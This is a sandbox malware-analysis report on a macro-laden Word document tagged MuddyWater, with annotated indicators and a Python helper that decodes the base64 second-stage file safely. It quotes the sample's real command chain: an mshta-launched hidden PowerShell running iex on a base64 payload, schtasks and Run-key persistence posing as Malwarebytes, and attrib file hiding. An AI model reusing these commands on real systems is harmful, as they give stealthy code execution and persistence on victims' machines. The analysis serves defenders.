d15aee026074fbd18f780fb51ec0632a.doc
This report is generated from a file or URL submitted to this webservice on December 8th 2018 15:20:25 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by
Falcon Sandbox v8.20 © Hybrid Analysis
Incident Response
Risk Assessment
- Spyware
  - Hooks API calls
- Persistence
  - Schedules a task to be executed at a specific time and date
  - Spawns a lot of processes
- Evasive
  - Found a reference to a WMI query string known to be used for VM detection
MITRE ATT&CK™ Techniques Detection
The ATT&CK IDs cited in the indicators below are from the 2018 matrix. Several have since been retired or merged: T1168 into T1053 (Scheduled Task/Job), T1060 into T1547.001, T1179 into T1056.004, T1035 into T1569.002 and T1063 into T1518.001.
Additional Context
OSINT
- External References: https://sec0wn.blogspot.com/2018/02/burping-on-muddywater.html
- External User Tags: #fireeye #iran #macros #malware #muddywater #powerstats #temp.zagros #vbs
Related Sandbox Artifacts
- Associated SHA256s: 3ea10f999e000036a36cb5adcc94658f133f339070e7daeebb65dfd4b58d1398
Indicators
Not all malicious and suspicious indicators are displayed.
Malicious Indicators (9)

External Systems

Sample was identified as malicious by a large number of Antivirus engines
- details: 39/59 Antivirus vendors marked sample as malicious (66% detection rate)
- source: External System
- relevance: 10/10

Sample was identified as malicious by at least one Antivirus engine
- details
  - 5/14 Antivirus vendors marked sample as malicious (35% detection rate)
  - 39/59 Antivirus vendors marked sample as malicious (66% detection rate)
- source: External System
- relevance: 8/10
General

Document spawns new processes
- details: Document spawned a new process (macro present)
- source: Indicator Combinations
- relevance: 7/10
Installation/Persistence

Schedules a task to be executed at a specific time and date
- details: Process "schtasks.exe" with commandline "/Create /RU system /SC ONLOGON /TN Microsoft\WindowsMalwareByteSDK /TR "wscript %ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs" /F"
- source: Monitored Target
- relevance: 8/10
- ATT&CK ID: T1168

Writes data to a remote process
- details
  - "WINWORD.EXE" wrote 32, 52 and 8 bytes to a remote process "%WINDIR%\System32\wscript.exe" (Handle: 1636)
  - "wscript.exe" wrote 32, 52 and 8 bytes to a remote process "C:\Windows\System32\mshta.exe" (Handle: 764)
  - "mshta.exe" wrote 32, 52 and 8 bytes to a remote process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (Handle: 800)
  - "powershell.exe" wrote 32, 52 and 8 bytes to a remote process "C:\Windows\System32\attrib.exe" (Handle: 820)
  - "powershell.exe" wrote 32, 52 and 8 bytes to a remote process "C:\Windows\System32\attrib.exe" (Handle: 1384)
  - "powershell.exe" wrote 32, 52 and 8 bytes to a remote process "C:\Windows\System32\schtasks.exe" (Handle: 820)
- source: API Call
- relevance: 6/10
- ATT&CK ID: T1055
- note: every write target is a child the writing process has just created (compare the process tree), and the 32/52/8-byte triple is identical for all of them, so this is the parent setting up its child at creation time rather than code injection into an existing process. Read it together with the "Creates new processes" indicator, not as T1055 on its own.
Unusual Characteristics

Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
  - Found keyword "\w+_(?:GotFocus|LostFocus|MouseHover)" which indicates: "Runs when the file is opened and ActiveX objects trigger events"
  - Found keyword "Document_Open" which indicates: "Runs when the Word or Publisher document is opened"
- source: Static Parser
- relevance: 10/10
- ATT&CK ID: T1137

Spawns a lot of processes
- details
  - Spawned process "WINWORD.EXE" with commandline "/n "C:\d15aee026074fbd18f780fb51ec0632a.doc""
  - Spawned process "wscript.exe" with commandline ""%ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs""
  - Spawned process "mshta.exe" with commandline "vbscript:Close(Execute("CreateObject(""WScript.Shell"").Run""powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))));"",0 "))"
  - Spawned process "powershell.exe" with commandline "-w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))));"
  - Spawned process "attrib.exe" with commandline "+s +h %ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs"
  - Spawned process "attrib.exe" with commandline "+s +h %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini"
  - Spawned process "schtasks.exe" with commandline "/Create /RU system /SC ONLOGON /TN Microsoft\WindowsMalwareByteSDK /TR "wscript %ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs" /F"
  - Spawned process "Setup.exe" with commandline "-Embedding"
- source: Monitored Target
- relevance: 8/10
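The chain above keeps its second stage off the command line: powershell.exe reads ProjectConfManagerNT.ini with get-content, base64-decodes it, decodes the result as UTF-16LE and hands it to iex, so the visible command line never changes while the payload file can. The Python below is an added example for triage, not code from the report or from the sample: it reproduces that decode step with iex replaced by a returned string. The .ini content it builds is a harmless placeholder (the real second stage is not on this page), and build_ini, decode_ini, decode_ini_file and PLACEHOLDER_STAGE2 are names chosen here.

```python
import base64
import codecs
import os
import tempfile

# Harmless stand-in for the second stage. The report only tells us that the .ini is
# UTF-16LE text holding one base64 blob whose decoded form is UTF-16LE PowerShell;
# the real payload is not on the page, so a placeholder script is used (assumption).
PLACEHOLDER_STAGE2 = 'Write-Output "stage-2 placeholder"; $env:COMPUTERNAME'


def build_ini(script: str) -> bytes:
    """Encode a script the way the loader expects to find it on disk:
    script -> UTF-16LE bytes -> base64 text -> file written as UTF-16LE, no newline."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return b64.encode("utf-16-le")


def decode_ini(ini_bytes: bytes) -> str:
    """Mirror the loader's one-liner without executing anything:
    get-content -> [Convert]::FromBase64String -> [Encoding]::Unicode.GetString."""
    data = ini_bytes[len(codecs.BOM_UTF16_LE):] if ini_bytes.startswith(codecs.BOM_UTF16_LE) else ini_bytes
    # Base64 is pure ASCII, so a UTF-16LE container has a zero in every odd byte.
    # Anything else is treated as a plain-ASCII variant of the same dropper.
    if len(data) % 2 == 0 and all(b == 0 for b in data[1::2]):
        b64_text = data.decode("utf-16-le")
    else:
        b64_text = data.decode("ascii", errors="ignore")
    payload = base64.b64decode("".join(b64_text.split()))
    # Unicode.GetString tolerates truncated input; errors="replace" does the same here.
    return payload.decode("utf-16-le", errors="replace")


def decode_ini_file(path: str) -> str:
    """Triage helper: decode a recovered .ini from disk and return the script text."""
    with open(path, "rb") as fh:
        return decode_ini(fh.read())


if __name__ == "__main__":
    # Write a constructed .ini to a temp file and decode it, as an analyst would with
    # a copy recovered from %ALLUSERSPROFILE%\SYSTEM32SDK\.
    fd, path = tempfile.mkstemp(suffix=".ini")
    with os.fdopen(fd, "wb") as fh:
        fh.write(build_ini(PLACEHOLDER_STAGE2))
    try:
        print(decode_ini_file(path))
    finally:
        os.remove(path)
```

Run it against the real ProjectConfManagerNT.ini from an infected host to get the stage-2 script as text; because the loader decodes with [Encoding]::Unicode, the recovered script is only readable if it is decoded as UTF-16LE, which is why decode_ini does not try UTF-8 first.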
Hiding 2 Malicious Indicators (available only in the private webservice or standalone version)
Suspicious Indicators (16)

Anti-Reverse Engineering

Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
- details: "powershell.exe" is allocating memory with PAGE_GUARD access rights
- source: API Call
- relevance: 10/10
- note: powershell.exe hosts the .NET runtime (see "Loads the .NET runtime environment" below); a PAGE_GUARD allocation in that process is weak evidence of anti-debugging on its own and should be weighed against the rest of the chain.
Environment Awareness

Contains ability to measure performance
- details: rdtsc from Setup.exe (PID: 2948)
- source: Hybrid Analysis Technology
- relevance: 10/10

Found a reference to a WMI query string known to be used for VM detection
- details
  - "private const x_HelpAlias_012_0_Message = " winrm get http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_Service?Name=WinRM"" (Indicator: "win32_service"; File: "ConfManagerNT.vbs")
  - "private const X_HelpAlias_015_0_Message = " winrm get wmicimv2/Win32_Service?Name=WinRM"" (Indicator: "win32_service"; File: "ConfManagerNT.vbs")
- source: File/Memory
- relevance: 10/10
- ATT&CK ID: T1047
- note: both hits are string constants holding winrm command-line help examples, matched on the keyword "win32_service"; the report records no WMI query actually being executed, so this does not by itself show VM detection.
General

Found a potential E-Mail address in binary/memory
- details
  - Pattern match: "qddgcbkr@a.jdzw"
  - Pattern match: "a@2.oww"
  - Pattern match: "_a3q@443..8"
  - Pattern match: "ylh@f2p.s331q"
  - Pattern match: "zk@fx.e"
  - Pattern match: "m@phbwlq-.dtw"
  - Pattern match: "t@sd8r.wn"
  - Pattern match: "4dlx@y.b"
- source: File/Memory
- relevance: 3/10
- ATT&CK ID: T1114
- note: none of these is a usable address; they are regex hits on obfuscated or random data and carry no collection-related meaning.

Opened the service control manager
- details
  - "WINWORD.EXE" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
  - "Setup.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
- source: API Call
- relevance: 10/10
- ATT&CK ID: T1035
- note: SC_MANAGER_CONNECT (0x1) is the minimum right and does not permit creating or starting a service; no service creation appears anywhere else in the report.

Removes Office resiliency keys (often used to avoid problems opening documents)
- details
  - "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "US/")
  - "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "2Y/")
  - "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "0Q/")
  - "WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS")
- source: Registry Access
- relevance: 10/10
- ATT&CK ID: T1112
Installation/Persistence

Creates new processes
- details
  - "WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\wscript.exe", Handle: 1636)
  - "wscript.exe" is creating a new process (Name: "%WINDIR%\System32\mshta.exe", Handle: not recorded)
  - "mshta.exe" is creating a new process (Name: "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe", Handle: 800)
- source: API Call
- relevance: 8/10

Executes a visual basic script
- details: Process "wscript.exe" with commandline ""%ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs""
- source: Monitored Target
- relevance: 10/10

Loads the task scheduler COM API
- details: "schtasks.exe" loaded module "%WINDIR%\System32\taskschd.dll" at FAF60000
- source: Loaded Module
- relevance: 5/10
- ATT&CK ID: T1168

Opens the MountPointManager (often used to detect additional infection locations)
- details
  - "WINWORD.EXE" opened "\Device\MountPointManager"
  - "mshta.exe" opened "\Device\MountPointManager"
- source: API Call
- relevance: 5/10
Ransomware/Banking

Contains calling to enable macros (often the case for malicious documents)
- details: "Once you have enable editing, please click Enable Content from the yellow bar above" (Indicator: "enable content")
- source: File/Memory
- relevance: 8/10
System Security

Hooks API calls
- details
  - "OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
  - "VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
  - "SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
  - "SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
  - "VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
- source: Hook Detection
- relevance: 10/10
- ATT&CK ID: T1179

Modifies proxy settings
- details
  - "wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  - "wscript.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  - "mshta.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  - "mshta.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  - "Setup.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  - "Setup.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
- source: Registry Access
- relevance: 10/10
- ATT&CK ID: T1112
- note: three unrelated processes (wscript.exe, mshta.exe and the Office Setup.exe) delete the same PROXYBYPASS value under ZONEMAP in both hives, which is consistent with Internet-zone initialisation by a shared system component rather than a deliberate proxy change; no proxy value is set, and the report records no network traffic.
Unusual Characteristics

Contains embedded VBA macros with suspicious keywords
- details
  - Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
  - Found suspicious keyword "Xor" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
  - Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
  - Found suspicious keyword "Open" which indicates: "May open a file"
  - Found suspicious keyword "Write" which indicates: "May write to a file (if combined with Open)"
  - Found suspicious keyword "CreateTextFile" which indicates: "May create a text file"
- source: Static Parser
- relevance: 10/10

Installs hooks/patches the running process
- details
  - "WINWORD.EXE" wrote bytes "401347fdfe070000" to virtual address "0xFD48FE48" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "401347fdfe070000" to virtual address "0xFD48FB48" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "a01267f6fe070000" to virtual address "0xFFC81648" (part of module "WININET.DLL")
  - "WINWORD.EXE" wrote bytes "e913b0e4ff" to virtual address "0xFF0550C0" ("OleLoadFromStream@OLE32.DLL")
  - "WINWORD.EXE" wrote bytes "48b8101767f6fe070000ffe0" to virtual address "0xFD471000" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "48b8e01367f6fe070000ffe0" to virtual address "0xFD471340" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "e94b9f2f01cccccccccc" to virtual address "0xFDBA6230" ("VariantChangeType@OLEAUT32.DLL")
  - "WINWORD.EXE" wrote bytes "97e7663d018fd401" to virtual address "0xEE8F71C0" (part of module "WWLIB.DLL")
  - "WINWORD.EXE" wrote bytes "001047fdfe070000" to virtual address "0xFD48FE18" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "001047fdfe070000" to virtual address "0xFD48FB18" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "d0023aeafe070000" to virtual address "0xFF0BA558" (part of module "OLE32.DLL")
  - "WINWORD.EXE" wrote bytes "401347fdfe070000" to virtual address "0xFD48FE10" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "001047fdfe070000" to virtual address "0xFD48FE50" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "401347fdfe070000" to virtual address "0xFD48FB10" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "001047fdfe070000" to virtual address "0xFD48FB50" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "48b8bc52fce9fe070000ffe0" to virtual address "0x777A9020" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
  - "WINWORD.EXE" wrote bytes "e9abc02f01cc" to virtual address "0xFDBA4060" ("SysAllocStringByteLen@OLEAUT32.DLL")
  - "WINWORD.EXE" wrote bytes "00100000" to virtual address "0xFD488468" (part of module "SSPICLI.DLL")
  - "WINWORD.EXE" wrote bytes "0ede663d018fd401" to virtual address "0xED62FA00" (part of module "GFX.DLL")
  - "WINWORD.EXE" wrote bytes "8f37cf3d018fd401" to virtual address "0xF4060160" (part of module "MSPTLS.DLL")
- source: Hook Detection
- relevance: 10/10
- ATT&CK ID: T1179

Hiding 1 Suspicious Indicator (available only in the private webservice or standalone version)
Informative (23)

Anti-Detection/Stealthiness

Possibly checks for the presence of an Antivirus engine
- details: "MalwareByteSDK" (Indicator: "malwarebytes")
- source: File/Memory
- relevance: 3/10
- ATT&CK ID: T1063
- note: the string is the name the sample gives its own persistence (task Microsoft\WindowsMalwareByteSDK and Run value MALWAREBYTESDK) so that it passes as Malwarebytes software; the report shows no check for an installed security product.
Anti-Reverse Engineering

Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details: SetUnhandledExceptionFilter@KERNEL32.DLL from Setup.exe (PID: 2948), 3 occurrences
- source: Hybrid Analysis Technology
- relevance: 1/10
Environment Awareness
Every entry in this group comes from Setup.exe (PID: 2948), the Office 2010 setup component started with "-Embedding" (its OSETUP.DLL, OSETUPUI.DLL, BRANDING.XML and SETUP.CHM appear under "Creates a writable file in a temporary directory" below), not from the macro's own stages.

Contains ability to query machine time
- details: GetSystemTime@KERNEL32.DLL (2 calls), GetSystemTimeAsFileTime@KERNEL32.DLL (4 calls) and GetLocalTime@KERNEL32.DLL (1 call) from Setup.exe (PID: 2948)
- source: Hybrid Analysis Technology
- relevance: 1/10
- ATT&CK ID: T1124

Contains ability to query the machine timezone
- details: GetTimeZoneInformation@KERNEL32.DLL from Setup.exe (PID: 2948)
- source: Hybrid Analysis Technology
- relevance: 1/10
- ATT&CK ID: T1124

Contains ability to query the machine version
- details: GetVersion@KERNEL32.DLL (3 calls), GetVersionExW@KERNEL32.DLL (5 calls) and GetVersionExA@KERNEL32.DLL (3 calls) from Setup.exe (PID: 2948)
- source: Hybrid Analysis Technology
- relevance: 1/10

Contains ability to query the system locale
- details: EnumSystemLocalesW@KERNEL32.DLL (1 call), GetUserDefaultLCID@KERNEL32.DLL (10 calls) and GetUserDefaultUILanguage@KERNEL32.DLL (1 call) from Setup.exe (PID: 2948)
- source: Hybrid Analysis Technology
- relevance: 1/10

Contains ability to query volume size
- details: GetDiskFreeSpaceExW@KERNEL32.DLL from Setup.exe (PID: 2948)
- source: Hybrid Analysis Technology
- relevance: 3/10
- ATT&CK ID: T1083

Makes a code branch decision directly after an API that is environment aware
- details
  - Found API call GetVersion@KERNEL32.DLL directly followed by "cmp eax, 80000000h" and "jnc 3FBCA3FEh" from Setup.exe (PID: 2948)
  - Found API call GetVersionExW@KERNEL32.DLL directly followed by "cmp eax, esp" and "je 3FBD3789h" from Setup.exe (PID: 2948)
  - Found API call GetVersion@KERNEL32.DLL directly followed by "cmp eax, 80000000h" and "jnc 3FBCA285h" from Setup.exe (PID: 2948)
  - Found API call GetVersionExW@KERNEL32.DLL directly followed by "cmp eax, ebx" and "je 3FBC2B95h" from Setup.exe (PID: 2948)
  - Found API call GetVersionExW@KERNEL32.DLL directly followed by "cmp eax, ecx" and "jne 3FBD3871h" from Setup.exe (PID: 2948)
  - Found API call GetVersion@KERNEL32.DLL directly followed by "cmp eax, 80000000h" and "jnc 3FBCA1B1h" from Setup.exe (PID: 2948)
  - Found API call GetVersionExA@KERNEL32.DLL directly followed by "cmp eax, ebx" and "je 3FBD444Ah" from Setup.exe (PID: 2948)
  - Found API call GetSystemTimeAsFileTime@KERNEL32.DLL directly followed by "cmp dword ptr [rsp+34h], ebx" and "ret " from Setup.exe (PID: 2948)
  - Found API call GetSystemTimeAsFileTime@KERNEL32.DLL directly followed by "cmp dword ptr [000000003FCB8808h], 00000000h" and "jne 3FBEA24Eh" from Setup.exe (PID: 2948)
  - Found API call GetSystemTimeAsFileTime@KERNEL32.DLL directly followed by "cmp eax, ebp" and "jnle 3FBE917Bh" from Setup.exe (PID: 2948)
  - Found API call GetVersionExA@KERNEL32.DLL directly followed by "cmp eax, edi" and "je 3FBF0870h" from Setup.exe (PID: 2948)
  - Found API call GetLocalTime@KERNEL32.DLL directly followed by "cmp dword ptr [rsp+20h], ebx" and "jnbe 3FBE7EDCh" from Setup.exe (PID: 2948)
- source: Hybrid Analysis Technology
- relevance: 10/10

Possibly tries to detect the presence of a debugger
- details: GetProcessHeap@KERNEL32.DLL from Setup.exe (PID: 2948), 9 occurrences
- source: Hybrid Analysis Technology
- relevance: 1/10
General

Contains embedded VBA macros
- details: details too long to display
- source: Static Parser
- relevance: 10/10

Contains embedded VBA macros (normalized)
- details
  - Normalized macro string: "http"
  - Normalized macro string: "KHyl.dataType"
  - Normalized macro string: "UllMYwoKUHJpdmF0ZSBGdW5jdGlvbiBHZXRFbGVtZW50QXR0cmlidXRlQnlYcGF0aChtc3htbE9iaiwgeHBhdGgsIGF0dHJpYnV0"
- source: File/Memory
- relevance: 10/10
- ATT&CK ID: T1137
- note: the third string is base64; it decodes to "RYLc", two newlines and the VBA/VBScript fragment "Private Function GetElementAttributeByXpath(msxmlObj, xpath, attribut" (the normalized string is truncated, so the fragment is too).

Creates a writable file in a temporary directory
- details
  - "WINWORD.EXE" created file "%TEMP%\~DF4325768A8A3ACF89.TMP"
  - "WINWORD.EXE" created file "%TEMP%\Word8.0\MSForms.exd"
  - "Setup.exe" created file "%TEMP%\Setup00000b84\OSETUP.DLL"
  - "Setup.exe" created file "%TEMP%\SetupExe(20181208163200B84).log"
  - "Setup.exe" created file "%TEMP%\Setup00000b84\OSETUPUI.DLL"
  - "Setup.exe" created file "%TEMP%\Setup00000b84\BRANDING.XML"
  - "Setup.exe" created file "%TEMP%\Setup00000b84\SETUP.CHM"
  - "Setup.exe" created file "%TEMP%\GimmeSetup(20181208163340B84).log"
- source: API Call
- relevance: 1/10

Creates mutants
- details
  - "\Sessions\1\BaseNamedObjects\Local\x64_10MU_ACBPIDS_S-1-5-5-0-56564"
  - "\Sessions\1\BaseNamedObjects\Local\x64_10MU_ACB10_S-1-5-5-0-56564"
  - "\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
  - "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
  - "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
  - "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-686412048-2446563785-1323799475-1001"
  - "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-686412048-2446563785-1323799475-1001"
  - "\Sessions\1\BaseNamedObjects\!IECompat!Mutex"
  - "\Sessions\1\BaseNamedObjects\_SHuassist.mtx"
  - "\Sessions\1\BaseNamedObjects\Global\_MSIExecute"
  - "\Sessions\1\BaseNamedObjects\pidKeyValidationMutex"
- source: Created Mutant
- relevance: 3/10

Drops files marked as clean
- details: Antivirus vendors marked dropped file "~_5aee026074fbd18f780fb51ec0632a.doc" as clean (type is "data")
- source: Binary File
- relevance: 10/10

Loads rich edit control libraries
- details
  - "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\Microsoft Shared\OFFICE14\RICHED20.DLL" at E5610000
  - "Setup.exe" loaded module "%WINDIR%\System32\riched20.dll" at F3A30000
- source: Loaded Module
- ATT&CK ID: T1179

Loads the .NET runtime environment
- details: "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll" at E0740000
- source: Loaded Module

Process launched with changed environment
- details
  - Process "wscript.exe" was launched with new environment variables: "WecVersionForRosebud.C8C="4""
  - Process "wscript.exe" was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles"
  - Process "wscript.exe" was launched with missing environment variables: "PROCESSOR_ARCHITEW6432"
  - Process "powershell.exe" was launched with modified environment variables: "MEOW"
  - Process "attrib.exe" was launched with new environment variables: "PSExecutionPolicyPreference="Bypass""
  - Process "attrib.exe" was launched with modified environment variables: "PSModulePath"
  - Process "Setup.exe" was launched with modified environment variables: "MEOW, PSModulePath"
  - Process "Setup.exe" was launched with missing environment variables: "PSExecutionPolicyPreference"
- source: Monitored Target
- relevance: 10/10
- note: the PSExecutionPolicyPreference="Bypass" variable inherited by attrib.exe is the trace left by "-exec Bypass" in the parent powershell.exe; it is a useful pivot when the PowerShell command line itself was not logged.

Scanning for window names
- details
  - "WINWORD.EXE" searching for class "NetUICtrlNotifySink"
  - "WINWORD.EXE" searching for class "REListbox20W"
  - "WINWORD.EXE" searching for class "OfficeTooltip"
  - "WINWORD.EXE" searching for class "MsoCommandBarPopup"
  - "WINWORD.EXE" searching for class "MSOBALLOON"
  - "WINWORD.EXE" searching for class "MsoHelp10"
  - "WINWORD.EXE" searching for class "AgentAnim"
  - "WINWORD.EXE" searching for class "mspim_wnd32"
- source: API Call
- relevance: 10/10
- ATT&CK ID: T1010

Spawns new processes
- details
  - Spawned process "wscript.exe" with commandline ""%ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs""
  - Spawned process "mshta.exe" with commandline "vbscript:Close(Execute("CreateObject(""WScript.Shell"").Run""pow ..."
  - Spawned process "powershell.exe" with commandline "-w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encodin ..." (UID: 00008857-00003784, Additional Context: "[System.Text.Encoding]::Unicode.GetString(FromBase64String((getontent %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini))); \{^ -DE#8R &LC7 >#yBwjvzS[System.Text.Encoding]::Unicode.GetString(FromBase64String((get-content %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini)))")
  - Spawned process "attrib.exe" with commandline "+s +h %ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs"
  - Spawned process "attrib.exe" with commandline "+s +h %ALLUSERSPROFILE%\SYSTEM32SDK\ProjectConfManagerNT.ini"
  - Spawned process "schtasks.exe" with commandline "/Create /RU system /SC ONLOGON /TN Microsoft\WindowsMalwareByteS ..."
  - Spawned process "Setup.exe" with commandline "-Embedding"
- source: Monitored Target
- relevance: 3/10
Installation/Persistence

Dropped files
- details
  - "ConfManagerNT.vbs" has type "Little-endian UTF-16 Unicode text with very long lines"
  - "~_5aee026074fbd18f780fb51ec0632a.doc" has type "data"
  - "d15aee026074fbd18f780fb51ec0632a.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Sat Dec 8 13:20:27 2018 mtime=Sat Dec 8 13:20:27 2018 atime=Sat Dec 8 13:20:36 2018 length=983040 window=hide"
  - "ProjectConfManagerNT.ini" has type "Little-endian UTF-16 Unicode text with very long lines with no line terminators"
  - "~WRS_12145297-CBEE-4101-BDC6-F8BD546DB9A4_.tmp" has type "data"
  - "BACF462D.wmf" has type "ms-windows metafont .wmf"
  - "10201FDC.wmf" has type "ms-windows metafont .wmf"
  - "index.dat" has type "data"
  - "17GPJA9KU9GW9OODB6Z0.temp" has type "data"
  - "~WRS_A3F12A40-44A8-4808-8AB8-97799042790C_.tmp" has type "data"
  - "SetupExe_20181208163200B84_.log" has type "ASCII text with CRLF line terminators"
  - "ExcludeDictionaryEN0409.lex" has type "Little-endian UTF-16 Unicode text with no line terminators"
  - "GimmeSetup_20181208163340B84_.log" has type "ASCII text with very long lines with CRLF line terminators"
  - "MSForms.exd" has type "data"
  - "~_Normal.dotm" has type "data"
- source: Binary File
- relevance: 3/10
- note: ConfManagerNT.vbs (the stage-1 script) and ProjectConfManagerNT.ini (the base64 stage-2 container) are the two files the macro writes to %ALLUSERSPROFILE%\SYSTEM32SDK and then hides with attrib +s +h; the rest are Word, Office Setup and Internet Explorer working files.

Modifies auto-execute functionality by setting/creating a value in the registry
- details
  - "powershell.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"; Key: "MALWAREBYTESDK"; Value: "wscript %ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs")
  - "powershell.exe" (Access type: "SETVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"; Key: "MALWAREBYTESDK"; Value: "wscript %ALLUSERSPROFILE%\SYSTEM32SDK\ConfManagerNT.vbs")
- source: Registry Access
- relevance: 8/10
- ATT&CK ID: T1060
- note: together with the ONLOGON task Microsoft\WindowsMalwareByteSDK this gives three persistence entries that all launch the same ConfManagerNT.vbs. The HKLM value and the "/RU system" task both require administrative rights, so on a standard-user host only the HKCU value would be expected to take; removal has to cover all three plus the SYSTEM32SDK directory.

Touches files in the Windows directory
- details
  - "WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\SortDefault.nls"
  - "WINWORD.EXE" touched file "%WINDIR%\System32\rsaenh.dll"
  - "WINWORD.EXE" touched file "%WINDIR%\System32\en-US\msctf.dll.mui"
  - "WINWORD.EXE" touched file "%WINDIR%\System32\spool\drivers\x64\3\SendToOneNoteNames.gpd"
  - "WINWORD.EXE" touched file "%WINDIR%\System32\spool\drivers\x64\3\SendToOneNote.ini"
- source: API Call
- relevance: 7/10
Network Related

Found potential URL in binary/memory
- details
  - Heuristic match: "C[q2WGiVQ6}.tN"
  - Pattern match: "qA.gJb/Uu"
  - Pattern match: "http://schemas.microsoft.com/wbem/wsman/1/config/service"
  - Pattern match: "http://schemas.dmtf.org/wbem/wsman/1/wsman/SelectorFilter"
  - Pattern match: "http://schemas.dmtf.org/wbem/wsman/1/wsman/selectorfilter"
  - Pattern match: "http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
